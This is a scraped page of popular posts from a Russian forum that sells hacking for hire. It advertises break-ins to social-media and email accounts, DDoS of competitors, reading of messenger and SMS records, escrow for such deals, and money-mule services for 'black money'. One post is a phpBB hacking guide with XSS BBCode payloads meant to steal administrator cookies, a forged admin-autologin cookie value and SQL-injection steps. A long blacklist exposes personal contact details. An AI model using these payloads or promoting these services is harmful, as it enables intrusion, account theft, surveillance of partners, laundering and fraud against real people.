Перейти к содержимому


Самый популярный контент


#42 Реклама на форуме.

Написано Admin : 24 Ноябрь 2015 - 04:27

Информация рекламнадателям!
Если вы решили разместить рекламу на нашем форуме в виде Банера на всех страницах форума, либо пометить ваше объявление как "Важное" и так далее,

просьба обращаться на почту:
XpRu@protonmail.com

Прикрепленные изображения

  • image-2.jpg
  • image-1.jpg
  • image-3.jpg
  • image.jpg



#246 Как провести безопасную сделку?

Написано Admin : 28 Февраль 2016 - 08:42

s1ojKdKrVa0.jpg




498186ab30e0.png

Приветствую, дорогие посетители и пользователи форума, в связи с последними событиями и многочисленным кидаловом людей, мы решили вести прямую борьбу с этим беспределом и создали открытый сервис как для клиентов так и для специалистов.

Кому будет интересна безопасная сделка и в чем ее гарантии?
Тут все просто, Вы заказчик, не можете доверить сумму исполнителю и хотите работать без предоплаты, в свою очередь исполнитель тоже тратит средства на работу и не может быть уверен в Вашей стороне и по любым другим причинам не хочет выполнять заказ без платежа.
Лучший выход тут - безопасная сделка.90% возврата и выплаты средств любой стороне.

Преимущества сделки в том, что ни администратор, ни заказчик, ни исполнитель не смогут внести никаких поправок в сделку, все предельно честно, если работа не выполнена - средства на возврат, если выполнена - средства на выплату.
Схема работы: Заказчик ----> создание личного сообщения администратору-----> оплата в фонд форума ------> получение результата
Исполнитель -----> подтверждение в теме (которая будет создана администратором для сделки) ------> выполнение работы ------> получение средств.
МЫ НЕ ЯВЛЯЕМСЯ ГАРАНТОМ!!! Гарант - это схема не совсем честная, будьте бдительны!
Основные правила:

1. Сделку может провести абсолютно любой желающий пользователь и гость форума.

2. Все сделки и договоренности заключаются напрямую с исполнителем и клиентом, без участия третьей стороны, при условии открытии сделки на общее обозрение команде и пользователям форума
(по желанию заказчика соответственно).

3. Клиент и исполнитель обязаны действовать строго по заявке (см. ниже)

Заказчик или исполнитель создает сообщение администратору сайта с названием сделки например:

Тема: Взлом вконтакте
Текст: Совершаю сделку с пользователем admin (указывает ник исполнителя) , по услуге взлома вконтакте (описываете суть сделки), с правилами форума ознакомлен и согласен. Комиссию в фонд форума оплачиваю я. Сумма сделки: 1 0000 рублей. Сроки работы : 2 дня. (Это пример!)


После второй оппонент сделки обязан отписаться, что принимает условия форума и подтверждает сделку.
Администратор подтверждает и одобряет сделку, сразу после оплаты суммы в фонд форума с комиссией. Сумма из фонда выплачивается исполнителю сразу, после Успешно выполненной работы.

4. Отвественность за сделку несет только сам заказчик и исполнитель, Администратор выполняет роль куратора сделки, но никаким образом не имеет к ней отношения.

5. Клиент либо исполнитель оплачивают единоразовый взнос в размере 10% за услуги безопасной сделки в фонд команды форума.

Наши гарантии :

1) Пройдена идентификация во всех платежных системах. (Webmoney, Yandex, QIWI, PM)
2) Чистая репутация с 2011 года, есть на всех закрытых площадках.
3) Принимаем оплату наличными и оплата любым удобным способом в платёжные системы.
4) Предоставим любые рекомендации нашей порядочности заинтересованным клиентам.

Запомните, мы отличаемся от гарантов, мы только курируем сделку,которая открыта всем оппонентам, благодаря этому, тут не может быть обмана, т.к все видят как завершилась сделка.

Ответы на вопросы:

1. Как заказать услуги хакера, чтобы меня не кинули?
- Создаете тему (сообщение Администратору) , по заявке написанной в верху данной темы, и ждете одобрение Администратора.
После того, как Администратор одобрил тему он вам предоставляет пароль от закрытой комнаты где и будет проходить сделка, находится там должны Администратор, вы и исполнитель. Оплачиваете взнос в фонд и исполнитель может начинать работать.
2.Может хакер как-то кинуть меня или обмануть через данную систему?
-Нет, ни Вы, ни хакер не смогут нарушить условия честной сделки, для этого любая сделка открыта для общего просмотра (На усмотрение клиента!) и ее курирует Администратор.
3. Что значит сделка открыта? Все смогут наблюдать каков мой заказ?
-Сделка открыта для большинства людей (рекомендуем закрытые комнаты), но всю приватную информацию (ссылку на анкету, сайт, почту и пр) видите только, Вы и хакер.
4. Для чего сделали открытые сделки?
- Для того, чтобы большинство людей видели как работает наша команда и борется с кидаловом. Открытые сделки помогают сохранить чистоту процесса и большинству пользователей подобрать нужного кандидата сделав вывод по его закрытым сделкам.
5. Что значит открытая и закрытая сделка?
- Открытая сделка - это когда вы дали заявку на работу и исполнитель ее подтвердил, но она еще в стадии выполнения. Закрытая сделка - это когда исполнитель выполнил работу и вы ее приняли без претензий.
Закрытые комнаты для сделок это отдельный форум где происходят сделки под контролем Администрации сайта. Другие пользователи не видят и не имеют доступа к вашему личному заказу (если для вас это важно)
6. Могу ли я приглашать исполнителей не являющимися пользователями вашего форума?
- Да, мы только приветствуем такого рода решения.
7. Каким образом я могу сделать оплату в фонд форума?
- Мы принимаем любой удобный для вас способ оплаты.
8. Я должен оплатить сумму работы вам? Чем вы отличаетесь от гаранта?
- Верно, вы оплачиваете сумму работы в фонд форума, что является гарантией для исполнителя,что вы платежеспособный клиент. Для вас гарантия в том, что сможете забрать средства в любой момент, так же исполнитель не получит средства до окончания работы и вашего согласия. Сумма в полном размере передается исполнителю, ТОЛЬКО ПОСЛЕ ЗАВЕРШЕНИЯ РАБОТЫ.
Наше отличие от гаранта в том, что мы открываем сделки для просмотра, по желанию заказчика, чтобы пользователи не сомневались в безопасности и знали, что в любой момент могут прекратить сделку и вернуть свои средства.


P.S Перевод на банковскую карту,осуществляется по запросу заказчика - Основателю форума,Через ЛС Возврат денежных средств осуществляется только по заявке заказчика, и переводится только на те реквизиты с которых производилась оплата!
Срок возврата осуществляется в течении 3-5 часов,с момента подачи заявки!
Подать заявку на сделку через гарант вы можете по этой ссылке:
https://xakerpro.ru/...romMemberID=133

s1ojKdKrVa0.jpg




498186ab30e0.png




#14 phpBB

Написано Admin : 23 Ноябрь 2015 - 11:11

1) Хочу понять, как же взламываются форумы phpbb.
 
Их можно взломать 5 способами:
1) Через уязвимость highlight. Дает исполнение команд на сервере. Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
2) Получить доступ к аккаунту администратора.
3) Через уязвимость в профайле signature_bbcode_uid Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
4) Взлом через моды.
5) Взлом через sql инъекцию.
2) Как получить аккаунт администратора на форуме?
 
1) Угадать, украсть, спросить.
2) XSS - позволяет украсть куки администратора и под ним зайти на форум. В версиях >2.0.19 нельзя войти в админку незная пароля.
xss для форума phpbb. Почти все найдены White Jordan.
[c*olor*=#EFE*FEF][forbidden link][/UR*L]  phpbb 2.0.17 Рушиться структура, код надо доработать[im*g]http://ww*w.phpbb.com/xx[em*ail]xx@*xx.com[/ema*il]images/p*hplogo.gif[/i*mg] [*url]ww*w.ut[forbidden link][/u*rl]' [*url=http://www.%*5burl=http://xx.com/style=display:no*ne;backgrou*nd#58;url(javascript: alert()&+#41; %5*dxx*]http://www.<a href="http://xx.com/style=displa...) " target="_*blank*">xx[/url]
 
пихаем все эти коды в сообщение, на сниффере ловим куки, подставляем их, и мы админы.
 
3) Получение админского аккаунта через багу в куках.
phpbbmysql_data:a%3A2%3A%7Bs%3A11%3A%22autologinid %22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222% 22%3B%7D
 
И мы становимся админом (если форум не пропатчен).
3) Как происходит взлом?
1) Просмотр версии форума. Она определяется заходом по ссылке http://site.ru/forum.../CHANGELOG.html
Смотрим какая там последняя версия и прибавляем единицу.
2) Проверку на уязвимость форума к багам highlight, админским кукам, signature_bbcode_uid.
Если сработало, иди в раздел "Заливка шелла в phpbb". Если не сработало.
3) Проверяем форум на sql уязвимости.
Делаем запросы:
Если сработало, то добываем хеш админа, расшифровываем.
4) Если ничего не помогло, теперь надо проверить форум на дырки в модах.
запросы:
Запросы для получение привилегий найдете на секьюрити порталах.
5) Взлом через xss.
 
4) Как узнать серверный путь форума?
http://site.ru/forum...erlist.php?mode[]=cx + дает возможно узнать префикс таблиц базы данных
 
Пути для форумов <2.0.10
5) Как узнать префикс таблиц базы данных?



#342 Услуги профессиональных хакеров.

Написано Admin : 04 Май 2016 - 11:07

УСЛУГИ ПРОФЕССИОНАЛЬНЫХ ХАКЕРОВ.
Рад приветствовать каждого пользователя который перешел на XAKERPRO.Info Сегодня решил обсудить по-видимому достаточно популярную тему. В которой будем вести обсуждение хакеров и услуги которе они предоставляют. Большая часть сюда перешли в надежде найти специалиста который оказал бы подобные услуги! Я уверен если вы по юзаете мой форум обязательно найдете такого человека. Мир в котором интернет технологии развиваются с бешеной скоростью услуги подобного рода имеют большую актуальность. Практически 70% современного бизнеса услуг связанно с рекламой в глобальной сети.Конкуренция между бизнесменами растет буквально по часам, многие желают применить хитрости и обратиться за помощью к специалистам.Даже пренебрегая законодательством Российской Федерации, давайте рассмотрим основные услуги этого рынка: Блокировка доменных имен: Зачастую возможная конкуренция разворачивается между сайтами. Которые пытаются вылезти в топовые позиции поисковых систем.Пренебрегая рядом фактором соперники готовы на любые шаги! Один из лучших вариантов заставить отступить своего оппонента. Заблокировать домен его сайта, во-первых это отразится на всей СЕО компании примененной к сайту! Во-вторых, подобные действия испугают вашего врага от подобных посягательств на клиентов. ДДос атаки: Еще один вариант опустить конкурента с небес на землю, обращаясь к хакеру за услугами досс. Вы гарантированно получаете временное отсутствие потенциального недруга в сети. Преобладая в поиске в это время.Отметим заблокировать домен выйдет достаточно дешевле чем, постоянно пользоваться досс атаками.Удаление негатива: За годы работы в сфере хакинга, ко мне обращались различные люди с различными проблемами. Частенько были соотечественницы жившие в Европе или Соединённых Штатах Америки. Засветившиеся на порталах связанных с порнографией. Приходилось удалять всю информацию, которую оставляли бывшие работодатели девушек.Личности с просьбой удалить фейковый аккаунт в tweetr и других социальных сетях. Подобные услуги хакеров стоят достаточно хорошо, и многим увы не по карману.Удаления негативно содержащего видео на youtube, администрации лояльно относится к видеозаписям содержащим информацию о какой-либо личности. Вспоминаются на моей памяти и негативные клиенты! Помните по всей стране ходили видео с большим накаченным скинхедом по имени ТЕСАК? Занимался он ловлей педофилов на живца, после чего избивал недолюдей и выкладывал запись в всемирную паутину.За лето когда этот парень проявлял максимальную активность ко мне обратились десятки педофилов с просьбой удалить и заблокировать аккаунт. Сейчас я подобным вещами не занимаюсь, скажу откровенно я их обманывал! Удалял запись, получал оплату сразу же восстанавливал!Считая действия этих людей аморальными, думаю я имел на это полное право и гражданскую позицию!Удаление отзывов:Пакости ненавистников и конкурентов, оставляют негативную информации о честных людях в интернете!Найти проверенного хакера который произвел удаления подобных тем достаточно тяжело. Необходим специалист оказывающий услуги не первый год своим клиентам. Представьте обыкновенный риэлтер, честный оказывающий не дорогие услуги. В общем пользующейся спросом знаток своего дела. Создается простая тема на форуме, и начинаются зарисовки негативных отзывов. Мол дилетант, обманул меня на кругленькую сумму! Если завистник вашей популярности заходит достаточно далеко, таких сообщений может быть очень много! Когда тема появляется в индексе сделать практически не чего нельзя. Особенно когда администрация форума не активна или принципиальна!Приходится пользоваться услугами специалистов, в данном случае хакеров. Платить деньги не понятно за что! Взлом социальных сетей: Нанять хакеры для взлома вконтакте или одноклассников, рядовое занятие! Тысячи людей пытаются сделать это ежедневно.Проверить любимую девушку на верность, или с кем общается ваш парень обыдённые причины обращения к программистам самоучкам.Читать мессенеджеры сообщений:Смартфоны, определить место расположение и многое другое. Все это под силу сделать обыкновенному взломщику. Вибер и whatsapp, стремительно завоевывают место подобных приложений в нашем обществе. Судя по росту выходит достаточно удачно! Русский человек от природы любит халяву, вибер и есть бесплатный вариант отправлять сообщения пользователям по всему миру! Как правильно заказать услуги у хакеров:Все большую актуальность подобные услуги взлома обретают у человечества в целом. Многие понимая этот факт, но не имея возможность предоставить их! Становятся мошенниками, обманывающими рядовых граждан.Расскажу принцип работы с хакерами без обмана:
№1. Обращайте внимание на опыт работы этого человека, если по каким либо причинам у вас хакер требует оплату в перед, это совсем не означает что он мошенники, сейчас многие работают по предоплате. Почему объяснять здесь не могу, спросите у тех кто предлагает услуги и если ответ вам покажется адекватным то и развернутым вы всё поймете. Если же начинаются отговорки не дающие нормального ответа на вопрос, то советуем предложить работу через гаранта.
№2. Предлагайте работать через гарант сервис, работая через гарантов у вас будет возможность получить услуги которые вы заказывали!Честный и профессиональный гарант стоит достаточно не дорого. Порядка 7% от суммы сделки.Если исполнитель согласился работать через гаранта это уже характеризует его с положительной стороны.
№3 Как правило, старайтесь просить предоставить доказательства выполненной работы, только после этого следует уведомить гаранта о завершении сделки!

Прикрепленные изображения

  • 8f718ec85c8d2b0f45effbfb13a458ac.png



#930 Партнеры по продвижению.

Написано Admin : 04 Июль 2016 - 08:33

Доброго времени суток уважаемые пользователи и гости.
Форум хакеров приветствует вас.
Хотелось бы поблагодарить наших партнеров, которые трудятся во благо форума на разных площадках интернета, российские сайты и не только. Сегодня выложу ссылки на страницы и группы на зарубежных площадках, таких как:
http://fb.com

http://plus.google.com

http://twiter.com

В дальнейшем пополним базу и российскими ссылками на страницы и группы которые созданы для развития форума.

Прикрепленные изображения

  • top-5-haker-programm.jpg



#344 Черный список.

Написано Admin : 04 Май 2016 - 12:02

Доброго времени суток уважаемые гости и друзья форума опытных хакеров! Сегодня я хочу предложить список самых популярных кидал в сфере взлома на заказ. Если вас обманули, пиши контакты хакера в теме!!!!! Сортировка по email: 122115@mail.ru 21216@mail.ru 3lom4ik@mail.ru 2512888@mail.ru 6576432@gmail.com 923667@gmail.com 979365@gmail.com acab@crimeon.com admin@crimeon.com aooyes.com akk.info.com@gmail.com alaridsusan@yandex.ru aleksandr_hak@inbox.ru aleksandrturop@gmail.com algonco.com andrey.savelin@mail.ru andrey_fofanov@bk.ru ngelskaya@mail.ru Anjelina_kr@list.ru anjelina-kr@yandex.ru anonim@hacksystem.ru aanonim.kiber.com@gmail.com antiemail@eml.cc anton1985v@mail.ru arslan011212@mail.ru artem.6508@mail.ru artem.andreev2014@yandex.ru vkeypro@mail.ru vlad.vz@mail.ru vlechenko97@mail.ru VP770066@email.ru vz-vk@list.ru vzll.pochta@gmail.com vzlom@hackerku.net vzlom@live.com vzlom64bit@gmail.com vzlom_vzlom86@mail.ru vzlom-odnoklassnikov.net vzlom.alexei@gmail.com vzlom.life@gmail.com vzlom.nazakaz@yandex.ru vzlom.profi@gmail.com vzlom.service@gmail.com vzlom.sistema.dos@gmail.com vzlom.soc@gmail.com vzlom.na.zakaz@gmail.com vzlom-voronin@mail.ru vzlom.vzlom.vzlom@gmail.com vzlom.x.com@gmail.com vzlom-anket@yandex.ru vzlom-na-zakaz.com vzlom-xakk@yandex.ru vzlom64bit@gmail.com vzlomaem.com@gmail.com vzlomai@outlook.com vzlomal82@gmail.com vzlomnikita@mail.ru vzlomov.ru@mail.ru vzlomPro@live.ru vzlomseti@gmail.com vzlomseti.my1.ru vzlomvkontakte.net vzlomvkontakte3@gmail.com vzlomzona.narod.ru vzlomzona@gmail.com w.hanter@outlook.com welcometousluga@gmail.com www.dosug@gmail.com x4000800@gmail.com xak.pass@bk.ru xak16@bk.ru xakep-1989@ya.ru xaker3902@gmail.com xaker.brut@gmail.com xakep.ing@gmail.com xaker.klub@yahoo.com xakep.ok@bk.ru xakker@outlook.com xspiriton@yahoo.com xsslook@outlook.com z.vzloma@yandex.ru zakaz.com@mail.ru zakaz.na.vzlom@yandex.ru zakaz.v.net@yandex.ru zakaz.vzloma.84@gmail.com zakaz-email@xakep.ru zakaz-vzloma@hack-pass.com zakaz-vzloma.net zakaz-vzloma@inbox.ru zakaz-vzloma-vk@hotmail.com zakazvzloma.com zakazemail@yandex.ru zevskom@yandex.ru zharikov.petechka@mail.ru zonavzlom@yandex.ru asc@mail.ru aypro@list.ru barnyhack@yahoo.com bedoev.artem@mail.ru bondar_andreyy@ro.ru breaking_91@mail.ru bronny@xaker.ru brytto_joker@bk.ru bunker001hackers@gmail.com bypassxx@gmail.com chaiko.11@mail.ru carina.hack@yandex.ru chestnyihaker@mail.ru ck94@bk.ru ck094@yandex.ru cool.amo2010@yandex.ru corp@eml.cc crackpas@gmail.com darkman_nv@mail.ru darth.venom1@rambler.ru davzlom@mail.ru ddos.hackerr@gmail.com defix@bk.ru dekoff.i@yandex.ru den-hacker@bk.ru dima-po-vzlomy@yandex.ru dimon.d.a.joper@mail.ru dmilat75@mail.ru doctor-info@mail.ru dostrova@inbox.ru dr.clows@yandex.ru dron.anonim@mail.ru ehacking@mail.ru egor.preobrajenski@gmail.com ehacking@outlook.com engineengs@gmail.com enjoy.prohacking@gmail.com evgeniy-kovalev1994@mail.ru ex8pert@mail.ru expert@ojooo.eu fenix592@gmail.com fenix592@rambler.ru festaxoff.valera@yandex.ru forum-hackeroff.ru garantprohack@gmail.com georg.iprof@yandex.ru gfdtk-8d@bk.ru gohackpro@gmail.com good-b2b@mail.ru good-hack@yandex.ru grandsioz@yandex.ru grinA@gmail.ru grinahack.ru grinahelp@ukr.net grinahelp@gmail.com gvlechenko@bk.ru gvlechenko@mail.ru hack-pass.com hack-pass@bk.ru hack-vk.com@bk.ru hack.haman@gmail.com hack.lebedev@yandex.ru hack.log.and.pass@gmail.com hack.portal@yandex.ru hacker.80@yandex.ru hacker.email@yandex.ru haker.maksimka@mail.ru haker089@yandex.ru hakerok.86@gmail.com hackerproff.fast@gmail.com hackerpromail@gmail.com hackers.2006-2012@yandex.ru hackers_2014@yahoo.com hackharlem@gmail.com hackinghelp@yandex.ru hackmarke@yahoo.com hackmidle@gmail.com hacks-all@yandex.ru hakedmaster@gmail.com hakervzom@gmail.com HaksOpen@gmail.com hank.luk@gmail.com HardBass09.p.ht High.Quality.Hacking@yandex.ru high-quality-hacking@yandex.ru icexakep2013@yandex.ru info-07@mail.ru installWorld@yandex.ru ithackexpert@gmail.com JABBER: w.hanter@jabber.org jackhelp@hotmail.ru jackhelp@yahoo.com jaovs1@yandex.ru kaisa59@rambler.ru kay@eml.cc kc1hacker@gmail.com kirillpetrenko@ymail.com kodq@fromru.com kornilov-hack@ya.ru kornilov-hack@yandex.ru korrnev.aleksandr@gmail.com KozaNostra777@hotmail.com krystiza@mail.ru krollik@bk.ru kukla1393@mail.ru kurbanov.hack@yandex.ru kurbanov-hack@ya.ru labin.oleg@yandex.ru lamer.vzlom@gmail.com lazykent91@gmail.com lekomtsev_r@mail.ru lenya.demchenko@mail.ru line-box@mail.ru lamer1221@ya.ru Lnchshij3@yandex.ru lomaemmilo@mail.ru lommila@mail.ru mail–miedkov89@mail.ru mail.boss7@gmail.com mail.crack@yandex.ru mail.crack.ru@yandex.ru mail_crack@rocketmail.com mails-open@yandex.ru mails.passw@gmail.com MailsWizard@gmail.com makarov.hack@yahoo.com mastxack@gmail.com motherfuker1337@yandex.ru mazahacka.ru@mail.ru mega-hack87@mail.ru mega_volt_hack@yahoo.com mi1anchik@yandex.ru miedkov89@mail.ru misha.uslugi.vzloma@gmail.com moikontakty.narod.ru molhan@inbox.ru moon.anneta@mail.ru mr.white.goodhacker@gmail.com motherfuker1337@yandex.ru ness@xaker.ru nadtoka.hakcer2010@yandex.ru nikita-popov93@yandex.ru nindeti@mail.ru olgavzlom@rambler.ru orpbox@mail.ru onhack@live.ru online.hackvzlom@gmail.com pas.s.fes@gmail.com pass.vxl@gmail.com passkey14@mail.ru passv.xl@gmail.com pass-2015@yandex.ru passfes@gmail.com Pavel.Hakk@mail.ru Pavel.Hakk@yandex.ru Pavel.Hakk@gmail.com petrikov-1989@inbox.ru petrulip1@mail.ru petrulip2@mail.ru pet1482@yandex.ru pochta809@bk.ru pochtallx@mail.ru pogdevelopers@gmail.com pomoguvzlomat@gmail.com povel1988@mail.ru powerofhack@yahoo.com pro.haker@bk.ru pro.vzlom@bk.ru pro.vzlom.profil@gmail.com PROFIvzlom@ya.ru professional@programist.ru proffi_vzlom@bk.ru progproff@yandex.ru promaster499@gmail.com promhack@ymail.com pros89@bk.ru prospeedhack@gmail.com provzlom@live.ru provz1om@yandex.ru Pro-vzloma@yandex.ru pro-vzloma2009@ya.ru rack.sascha2016@yandex.ru rad4uk@yahoo.com radchuk-it@mail.ru rich.hacker2014@yandex.ru robin.pass@ymail.com romantsev.eduard@mail.ru roma.starkov.88@mail.ru roman.dudarew12@yandex.ru ruhak@xaker.ru RussianHackService@yandex.ru saita.moderator@yandex.ru satoret@yandex.ru sgegory@ymail.com servis@programist.ru shellhacker78@gmail.com sidr.nikolay@mail.ru siti.scan@mail.ru slava.hax@yandex.ru slomaem@xaker.ru sochelper01@gmail.com solovev.vasyusha@inbox.ru spyhacker@mail.ru stepan.vzlom@yandex.ru super.hackzone@yandex.ru support@hackergate.net tdssdos@gmail.com tolikzakharov@yandex.ua ttomik01@gmail.com unknow.xakep@yandex.ru uslugavk@yandex.ru uslugi.po.vzlomu@yandex.ru uslugi-hackera@rambler.ru uslugi-vzlom@mail.ru uslugivzloma@yandex.ru v-hack@mail.ru vashurkin2012@gmail.com vasya2010z@mail.ru vavasik90@mail.ru vippomoch@xaker.ru vk-od@rambler.ru Сортировка по Skype: abra-kadabra67 abrcadabr67 brytto_joker de7phi good-hack HaksOpen haker20151 KENIROKEN kioto9112 MailsWizard marina_ernest miedkov89 Nikita-popov93 nindeti Skype Pavel_Hakk powerofhack shOrtle shket30144 tx4hack vasya2010z vzlom_hack vzlom.on@yandex.ru vzlom2012 xakermen.xakermen skype@hacksystem.ru Сортировка по icq: 111-111-463 180-220 197-79-33 217-627 220-772 222-84-82 276-71-73 318-319 354-599-095 379-892 403-99-00 465-229-798 474-622-857 479-614 551-837 555-333-777 561-658-721 564-455-785 576-432 576-99-00 577-668-445 589-999-71 602-374-488 603-403-038 605-349-067 605-511-466 611-926-090 615–942-753 616-963-483 617-985-842 623-478-760 633-133-323 633-376-723 633-684-500 649-008-31 650-952-099 654-547-171 655-534-448 656-955-368 657-964-762 667-038-788 675-608-888 677-000-002 681-355-178 681-813-681 684-801-171 688-023-196 692-753-919 696-213-359 943-494-60 996-032 998-98-98 Сортировка по вконтакте: vk.com/id231591923 vk.com/id250053527 vk.com/id126683114 vk.com/id86157862 vk.com/id126683114 vk.com/id226365874 vk.com/id312650110 vk.com/id329445437 vk.com/id38168233 vk.com/ck944 vk.com/dyhaa vk.com/grinahack vk.com/hak.pro81 vk.com/hakervzlom2015 vk.com/lisaveta7 vk.com/mskk2 vk.com/powerofhack vk.com/giprof vk.com/vladimirfedorov88
stanislavpacker@hotmail.com

Если вы нашли хакера к которуму хотели обратиться в этом списке советуем вам предостерегаться! Соблюдайте правила! №1. ПОЛЬЗУЙТЕСЬ ГАРАНТОМ! И ЧИТАЙТЕ XAKERPRO.Info (ФОРУМ ХАКЕРОВ И ПРОГРАММИСТОВ)

Прикрепленные изображения

  • 1450969123.jpg



#141 УСЛУГИ ВЗЛОМА СТРАНИЦ ПОЧТЫ И ДЕТАЛИЗАЦИЯ СМС. ОПЫТ РАБОТЫ, РАЗУМНЫЕ ЦЕНЫ.

Написано Xaker : 15 Февраль 2016 - 10:20

Приветствую вас Уважаемые клиенты.
Предлагаю услуги взлома страниц, социальных сетей,таких как:
Одноклассники, Vk.com, Facebook и др.
Взлом почты любых почтовых серверов, таких как:
Яндекс (Yandex), Гугл (google),
Mail.ru он же (Мой мир), Рамблер (rambler) и др.
А также выполняю детализацию смс мобильного
любых операторов сотовой связи,
детализация Skype, Viber, WhatsApp и другие.
Быстро качественно, надежно.
Опыт работы с 2009года,
работаю по сегодняшний день и не собираюсь прекращать.
Разумные цены на услуги, опыт. Обращайтесь.

КОНТАКТНЫЕ ДАННЫЕ

Почта:√
XakerFox@mail.ru



Сайт:
http://xaker.rolfor.ru/



ВНИМАНИЕ!
УВАЖАЕМЫЕ ПОЛЬЗОВАТЕЛИ
УБЕДИТЕЛЬНО ПРОСИМ ВАС.
ОБРАЩАТЬСЯ. НЕПОСРЕДСТВЕННО
ПО ТЕМ КОНТАКТНЫМ ДАННЫМ,
КОТОРЫЕ. МЫ УКАЗАЛИ ВЫШЕ,
В ОПИСАНИИ ТЕМЫ!
В случае если вы обращайтесь по контактным данным, которые оставил кто-то другой в комментариях, вы рискуете стать жертвой мошенников, мы не несем ответственности за это. Будьте внимательны!

Прикрепленные изображения

  • 1461058277610.jpg



#418 форум-хакеров.рф В черном списке, обман пользователей

Написано Admin : 29 Май 2016 - 02:52

Доброго времени суток, приветствую вас снова на форуме хакеров.
XAKERPRO.INFO
Пишу по теме, прошло два дня и администратор все-таки ответил нашей Natali777 на сайте форум-хакеров.рф
Наша страница Natali777 как вы помните, просила проверить наш новый почтовый ящик-'соответственно админ не знает что ящик наш' на то можно ли ему доверять, как я и ожидал, администратор добавил нашу тему в разделе 'проверка хакеров и сервисов в интернете' на их форуме.
Наш новый почтовый ящик, который не где не фигурирует,
(вообще нигде так как он совершенно новый) оказался по их мнению мошенником, которому верить нельзя)))

можете зайти посмотреть, вот ссылка:
http://форум-хакеров...go7gooyandexru/

Для тех кто не читал тему разоблачения их форума, не поймет.
Прошу тех, кто не читал описание этой темы, вначале прочесть описание и тогда Вам всё станет ясно.
Выкладываю ссылки и скрины, чтоб всё было максимально открыто.
Вообщем таким образом форум хакеров рф занял свое место в нашем разделе черного списка.
Заходите проверяйте сами, всё максимально открыто делаю, чтоб всем было видно, как они хитро вводят в заблуждение обыкновенных пользователей, дабы выставить свои услуги реально рабочими, а остальные услуги даже не проверяются ими и автоматически объявляются мошенниками))), повторюсь (просто выставить визуально свои услуги рабочими!!) их услуги также настроены на обман пользователей, как и их форум, будьте бдительны!!!
Спасибо за внимание, я надеюсь вам была полезна наша статья.
Профессиональные хакеры и опытные программисты, не важно форум это или просто человек который предлагает свои услуги взлома или хакера, никогда не будет без проверки называть того или иного мошенником, тем самым вводя пользователя в заблуждение, дабы обратились только к ним за помощью, будьте бдительны помощи вы от них не дождетесь, вас обманут будьте бдительны!!!

Кстати на почту Go7goo@ya.ru так и не поступило не каких писем с просьбой помочь хотя-бы, они ведь должны были от чего то отталкиваться, прежде чем называть новый совершенно (повторюсь) Новый ящик, который был создан 2 дня назад, как и регистрация Natali777, на их форуме и создана тема с просьбой проверки нашего же (ящика шпиона)))

Вывод http://форум-хакеров.рф ресурс мошенников

Спасибо за внимание.
Форум хакеров XAKERPRO.INFO

Прикрепленные изображения

  • image.jpg



#27879 Бесплатный чекер аккаунтов ВКонтакте

Написано Edwardemeno : 15 Октябрь 2020 - 07:14

https://vk.progs.su/
Бесплатный чекер аккаунтов ВКонтакте,
для быстрой проверки аккаунтов ВКонтакте на валидность,
полной информации об анкете страницы ВК.

Гибкая система управления и сортировки аккаунтов по анкете,
выборка по критериям.
Доступна проверка на:
статус, актив, голоса, управление групп, друзья, подписчики, подарки, id страницы, страна, город, пол, возраст, семейное положение, аватарка, фамилия имя, количество записей.
Разгадывание капчи сервисом Rucaptcha.com (ключ капчи).
И другие функции в новых версия.

Сайт https://vk.progs.su/


#27775 краткий отзыв xakerfox@mail.ru

Написано SealMaster : 25 Сентябрь 2020 - 01:55

Никаких особенных заказов у этого хакера я не делал. Стандартный взлом, обычной странички, ничего такого. Ну собственно работа выполнена, выполнена в целом неплохо.. Результат меня устроил, поэтому этого взломщика я могу посоветовать другим людям. Его почта - xakerfox@mail.ru. Моя оценочка 5/5.. Ничего лишнего, удачной работы вам!




#27425 Заработок в интернете

Написано b1Squ1t : 09 Январь 2019 - 05:47

Как легко, получается создают фишинговый сайт (или как оно там) и просто ломают аккаунты? 

 

Да, этот называется фишинг. Согласно википедии:

 

Фишинг — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям. Это достигается путём проведения массовых рассылок электронных писем от имени популярных брендов, а также личных сообщений внутри различных сервисов, например, от имени банков или внутри социальных сетей. В письме часто содержится прямая ссылка на сайт, внешне неотличимый от настоящего, либо на сайт с редиректом. После того как пользователь попадает на поддельную страницу, мошенники пытаются различными психологическими приёмами побудить пользователя ввести на поддельной странице свои логин и пароль, которые он использует для доступа к определённому сайту, что позволяет мошенникам получить доступ к аккаунтами и банковским счетам.




#26251 Дропы под любые цели.

Написано Admin : 01 Июль 2018 - 10:19

Дорогие пользователи и гости форума хакеров, появилась услуга безопасного вывода средств, Если вам нужно вывести черные деньги, Либо получить на почте товар и прочее, то вы можете обратиться к нам по данному вопросу.

Мы предлагаем получить средства под определенный процент.
Плюсы в том что вы не рискуете не чем, всю работу дроп берет на себя, забирает процент от суммы и остальные деньги переводит на любой счет который скажете, лимита по сумме нет.
Возможны переводы Western Union, мигом и прочие переводы, Вы можете не беспокоится за ваши деньги и проблемы с выводом.
По вопросам заключения сделки, обращайтесь в личные сообщения или Телеграм
@XpRo_bot




#25309 Качество работы доставит вам удовольствие!

Написано byvaliy : 22 Март 2018 - 05:00

-------------------------------------Acount.attack.hakker@gmail.com-------------------------------------

                          Вы получите от нашего сервиса следующие услуги взлома на заказ:
 
- Быстрое выполнение заказа
- Качество работы доставит вам удовольствие
- Гарантируем конфиденциальность каждому клиенту


vk и ok
  Что вы получите от нашего сервиса, заказывая взлом вконтакте или одноклассники:
- Пароль и логин для входа без изменения (в единственном случае можем изменить, если об этом просит клиент)
- Повторный взлом бесплатно, если жертва поменяет пароль в течении месяца
- Доказательства - на ваш выбор
- Анонимность и качественное выполнение заказа
- Даем всю необходимую информацию для безопасного входа на страницу жертвы


Выполним для вас взлом: Instagram, Twitter, ICQ, Skype, Viber, Whatsapp (что не нашли - уточняйте)

Взломаем САЙТ конкурентов, удалим негативные ОТЗЫВЫ (фото, видео и не только), осуществляем взлом EMAIL

Если вам необходимо удалить отрицательную Кредитную Историю - это снова к Acount.attack.hakker@gmail.com. Мы можем почистить вашу БКИ, а также повысить скоринговый балл



║║ ─ ╔╗ ─ ║╔ ─ ╔═ ─ ╔╗
╠╣ ─ ╠╣ ─ ╠╣ ─ ╠═ ─ ╠╝
║║ ─ ║║ ─ ║╚ ─ ╚═ ─ ╠╗






Почему именно у Acount.attack.hakker@gmail.com стоит заказать взлом?
1) В нашем сервисе работают только профессионалы, которые сделают работу в срок
